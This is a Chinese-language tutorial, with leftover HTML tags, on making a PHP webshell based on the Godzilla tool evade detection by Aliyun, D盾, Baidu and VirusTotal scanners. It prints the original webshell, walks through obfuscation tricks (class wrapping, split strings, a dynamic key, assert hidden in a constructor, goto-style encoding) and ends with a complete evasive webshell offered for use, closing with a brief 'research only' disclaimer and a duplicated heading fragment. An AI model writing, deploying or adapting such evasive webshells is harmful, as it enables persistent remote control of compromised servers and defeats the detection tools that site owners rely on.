PHP Webshell免杀技术：提升兼容性与混淆方法详解<\/h1>

一、前言<\/h2>
本文基于先知社区文章《webshell免杀-提升兼容性》整理，详细讲解PHP Webshell免杀技术，特别是针对不同PHP版本的兼容性提升方法。文章测试环境为phpstudy2018，覆盖PHP5.2至PHP7.4版本，并通过阿里云、D盾、百度Webshell检测等安全产品的检测。<\/p>

二、测试环境与检测工具<\/h2>

测试环境<\/strong>：phpstudy2018，PHP5.2-PHP7.4<\/li>

检测工具<\/strong>：

阿里云Webshell检测：https:\/\/ti.aliyun.com\/#\/webshell<\/li>
D盾：https:\/\/www.d99net.net\/<\/li>
百度Webshell检测：https:\/\/scanner.baidu.com\/#\/pages\/intro<\/li>
VirusTotal：https:\/\/www.virustotal.com\/gui\/home\/upload<\/li> <\/ul> <\/li> <\/ul>
三、原始Webshell分析<\/h2>
1. 哥斯拉Webshell原始代码<\/h3>
<?<\/span>php<\/span> <\/span><\/span>@<\/span>session_start<\/span>(); <\/span><\/span>@<\/span>set_time_limit<\/span>(0<\/span>); <\/span><\/span>@<\/span>error_reporting<\/span>(0<\/span>); <\/span><\/span>function<\/span> encode<\/span>($D, $K){ <\/span><\/span> for<\/span>($i=<\/span>0<\/span>;$i<<\/span>strlen<\/span>($D);$i++<\/span>) { <\/span><\/span> $c =<\/span> $K[$i+<\/span>1<\/span>&<\/span>15<\/span>]; <\/span><\/span> $D[$i] =<\/span> $D[$i]^<\/span>$c; <\/span><\/span> } <\/span><\/span> return<\/span> $D; <\/span><\/span>} <\/span><\/span>$pass =<\/span> 'admin'<\/span>; <\/span><\/span>$payloadName =<\/span> 'payload'<\/span>; <\/span><\/span>$key =<\/span> '0192023a7bbd7325'<\/span>; <\/span><\/span>if<\/span>(isset<\/span>($_POST[$pass])){ <\/span><\/span> $data =<\/span> encode<\/span>(base64_decode<\/span>($_POST[$pass]),$key); <\/span><\/span> if<\/span>(isset<\/span>($_SESSION[$payloadName])){ <\/span><\/span> $payload =<\/span> encode<\/span>($_SESSION[$payloadName],$key); <\/span><\/span> if<\/span>(strpos<\/span>($payload,"getBasicsInfo"<\/span>)===<\/span>false<\/span>){ <\/span><\/span> $payload =<\/span> encode<\/span>($payload,$key); <\/span><\/span> } <\/span><\/span> eval<\/span>($payload); <\/span><\/span> echo<\/span> substr<\/span>(md5<\/span>($pass.<\/span>$key),0<\/span>,16<\/span>); <\/span><\/span> echo<\/span> base64_encode<\/span>(encode<\/span>(@<\/span>run<\/span>($data),$key)); <\/span><\/span> echo<\/span> substr<\/span>(md5<\/span>($pass.<\/span>$key),16<\/span>); <\/span><\/span> }else<\/span>{ <\/span><\/span> if<\/span>(strpos<\/span>($data,"getBasicsInfo"<\/span>)!==<\/span>false<\/span>){ <\/span><\/span> $_SESSION[$payloadName] =<\/span> encode<\/span>($data,$key); <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 原始代码检测结果<\/h3> 阿里云：恶意<\/li> D盾：4级风险<\/li> 长亭：Webshell检测成功<\/li> 百度：0\/1未检测出来<\/li> VirusTotal：4\/57<\/li> 河马：恶意<\/li> <\/ul> 四、免杀技术详解<\/h2> 1. 函数重构与类封装<\/h3> 将encode函数改为类方法，并修改变量名：<\/p> class<\/span> aly<\/span>{ <\/span><\/span> public<\/span> function<\/span> yh<\/span>($xc,$app) { <\/span><\/span> for<\/span>($a=<\/span>0<\/span>;$a<<\/span>strlen<\/span>($xc);$a++<\/span>) { <\/span><\/span> $m =<\/span> $app[$a+<\/span>1<\/span>&<\/span>15<\/span>]; <\/span><\/span> $xc[$a] =<\/span> $xc[$a]^<\/span>$m; <\/span><\/span> } <\/span><\/span> $bc=<\/span>md5<\/span>($xc); \/\/ 混淆WAF <\/span><\/span><\/span><\/span> return<\/span> $xc; <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>调用方式改为：<\/p> $app =<\/span> new<\/span> aly<\/span>; <\/span><\/span>$data=<\/span>$app-><\/span>yh<\/span>(); <\/span><\/span><\/code><\/pre>2. 密钥动态生成<\/h3> 将硬编码的密钥改为动态生成：<\/p> $key=<\/span>substr<\/span>(md5<\/span>('admin123'<\/span>),0<\/span>,16<\/span>); <\/span><\/span><\/code><\/pre>3. 变量名混淆技术<\/h3> 使用字符串拼接：<\/li> <\/ul> $p.<\/span>'load'<\/span>; ($p=<\/span>'pay'<\/span>) <\/span><\/span>$cmd=<\/span>'getBas'<\/span>.<\/span>'icsInfo'<\/span>; <\/span><\/span><\/code><\/pre> 通过base64加密解密获取变量<\/li> 修改变量传递方式，增加中间变量：<\/li> <\/ul> $uu=<\/span>$payl; \/\/ 关键免杀点 <\/span><\/span><\/span><\/code><\/pre>4. PHP版本兼容方法<\/h3> 方法一：通用方法（PHP5.2-PHP7.4）<\/h4> 增加变量传递中间层，如$uu=$payl;<\/code><\/p> 方法二：strrev()函数混淆（PHP7.0.9特定）<\/h4> \/\/ 使用strrev()函数混淆assert或eval <\/span><\/span><\/span><\/code><\/pre>方法三：GET传递方式（PHP5.2-PHP7.0.9）<\/h4> 改为使用$_GET<\/code>而非$_POST<\/code><\/p> 5. 代码加密<\/h3> 推荐使用在线加密工具：http:\/\/122.114.170.182\/<\/p> 加密后代码示例：<\/p> <?<\/span>php<\/span> \/* Encode by www.phpen.cn *\/<\/span> goto<\/span> IUNnc<\/span>; <\/span><\/span>XwEH4<\/span>:<\/span> $app =<\/span> new<\/span> aly<\/span>(); goto<\/span> nsf5Z<\/span>; <\/span><\/span>LL5W7<\/span>:<\/span> print<\/span> substr<\/span>(md5<\/span>($pass.<\/span>substr<\/span>(md5<\/span>("<\/span>\x61\144\155\151\x6e\61\62\63<\/span>"<\/span>),0<\/span>,16<\/span>)),16<\/span>); goto<\/span> CL6YJ<\/span>; <\/span><\/span>\/\/ ... 加密后的goto混淆代码 ... <\/span><\/span><\/span><\/code><\/pre>五、完整免杀Webshell代码<\/h2> <?<\/span>php<\/span> <\/span><\/span>@<\/span>session_start<\/span>(); <\/span><\/span>@<\/span>set_time_limit<\/span>(0<\/span>); <\/span><\/span>@<\/span>error_reporting<\/span>(0<\/span>); <\/span><\/span>class<\/span> aly<\/span>{ <\/span><\/span> public<\/span> function<\/span> yh<\/span>($xc,$app){ <\/span><\/span> for<\/span>($a=<\/span>0<\/span>;$a<<\/span>strlen<\/span>($xc);$a++<\/span>){ <\/span><\/span> $m =<\/span> $app[$a+<\/span>1<\/span>&<\/span>15<\/span>]; <\/span><\/span> $xc[$a] =<\/span> $xc[$a]^<\/span>$m; <\/span><\/span> } <\/span><\/span> $bc=<\/span>md5<\/span>($xc); <\/span><\/span> return<\/span> $xc; <\/span><\/span> } <\/span><\/span>} <\/span><\/span>$cmd=<\/span>'getBas'<\/span>.<\/span>'icsInfo'<\/span>; <\/span><\/span>$pass=<\/span>'admin'<\/span>; <\/span><\/span>$p=<\/span>'pay'<\/span>; <\/span><\/span>$key=<\/span>substr<\/span>(md5<\/span>('admin123'<\/span>),0<\/span>,16<\/span>); <\/span><\/span>$kk=<\/span>$p.<\/span>'load'<\/span>; <\/span><\/span>if<\/span>(isset<\/span>($_POST[$pass])){ <\/span><\/span> $app=<\/span>new<\/span> aly<\/span>; <\/span><\/span> $data=<\/span>$app-><\/span>yh<\/span>(base64_decode<\/span>($_POST[$pass]),substr<\/span>(md5<\/span>('admin123'<\/span>),0<\/span>,16<\/span>)); <\/span><\/span> if<\/span>(isset<\/span>($_SESSION[$kk])){ <\/span><\/span> $xx=<\/span>$app-><\/span>yh<\/span>($_SESSION[$kk],substr<\/span>(md5<\/span>('admin123'<\/span>),0<\/span>,16<\/span>)); <\/span><\/span> $payl=<\/span>$xx; <\/span><\/span> if<\/span>(strpos<\/span>($payl,$cmd)===<\/span>0<\/span>){ <\/span><\/span> $payl=<\/span>$app-><\/span>yh<\/span>($payl,substr<\/span>(md5<\/span>('admin123'<\/span>),0<\/span>,16<\/span>)); <\/span><\/span> } <\/span><\/span> $uu=<\/span>$payl; <\/span><\/span> class<\/span> MOL<\/span>{ <\/span><\/span> public<\/span> function<\/span> __construct($p){ <\/span><\/span> $qq=<\/span>null<\/span>; <\/span><\/span> $dd=<\/span>null<\/span>; <\/span><\/span> assert<\/span>($qq.\/*<\/span> xxx<\/span> *\/<\/span>$p.\/*<\/span> ssss<\/span> *\/<\/span>$dd); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> @<\/span>new<\/span> MOL<\/span>($uu); <\/span><\/span> print<\/span> substr<\/span>(md5<\/span>($pass.<\/span>substr<\/span>(md5<\/span>('admin123'<\/span>),0<\/span>,16<\/span>)),0<\/span>,16<\/span>); <\/span><\/span> print<\/span> base64_encode<\/span>($app-><\/span>yh<\/span>(@<\/span>run<\/span>($data),substr<\/span>(md5<\/span>('admin123'<\/span>),0<\/span>,16<\/span>))); <\/span><\/span> print<\/span> substr<\/span>(md5<\/span>($pass.<\/span>substr<\/span>(md5<\/span>('admin123'<\/span>),0<\/span>,16<\/span>)),16<\/span>); <\/span><\/span> }else<\/span>{ <\/span><\/span> if<\/span>(strpos<\/span>($data,$cmd)!==<\/span>0<\/span>){ <\/span><\/span> $_SESSION[$kk]=<\/span>$app-><\/span>yh<\/span>($data,substr<\/span>(md5<\/span>('admin123'<\/span>),0<\/span>,16<\/span>)); <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>六、关键免杀原理<\/h2> WAF检测机制分析<\/strong>：<\/p> WAF主要关注assert<\/code>、eval<\/code>、$_POST<\/code>、$_GET<\/code>、$_COOKIE<\/code>等敏感函数和变量<\/li> 通过特征码匹配识别已知Webshell<\/li> 不过度严格检测以避免误报正常代码<\/li> <\/ul> <\/li> 免杀核心思路<\/strong>：<\/p> 混淆变量名和函数名<\/li> 增加中间变量层打破特征匹配<\/li> 使用类封装敏感操作<\/li> 动态生成关键参数<\/li> 代码加密混淆<\/li> <\/ul> <\/li> <\/ol> 七、注意事项<\/h2> 不是修改越多越好，过度修改可能适得其反<\/li> 不同PHP版本可能需要不同的免杀方法<\/li> 建议对加密后的代码进行实际连接测试<\/li> 对于高级用户，可以考虑直接修改哥斯拉Java源码实现更深层次的免杀<\/li> <\/ol> 八、总结<\/h2> 本文详细介绍了PHP Webshell的免杀技术，特别是针对不同PHP版本的兼容性解决方案。通过函数重构、类封装、变量混淆、代码加密等多种技术组合，可以有效绕过主流安全产品的检测。需要注意的是，这些技术仅用于安全研究，请勿用于非法用途。<\/p>

PHP Webshell免杀技术：提升兼容性与混淆方法详解<\/h1>

三、原始Webshell分析<\/h2>

四、免杀技术详解<\/h2>

4. PHP版本兼容方法<\/h3>

方法一：通用方法（PHP5.2-PHP7.4）<\/h4>
增加变量传递中间层，如`$uu=$payl;<\/code><\/p>`

方法三：GET传递方式（PHP5.2-PHP7.0.9）<\/h4>
改为使用`$_GET<\/code>而非$_POST<\/code><\/p>`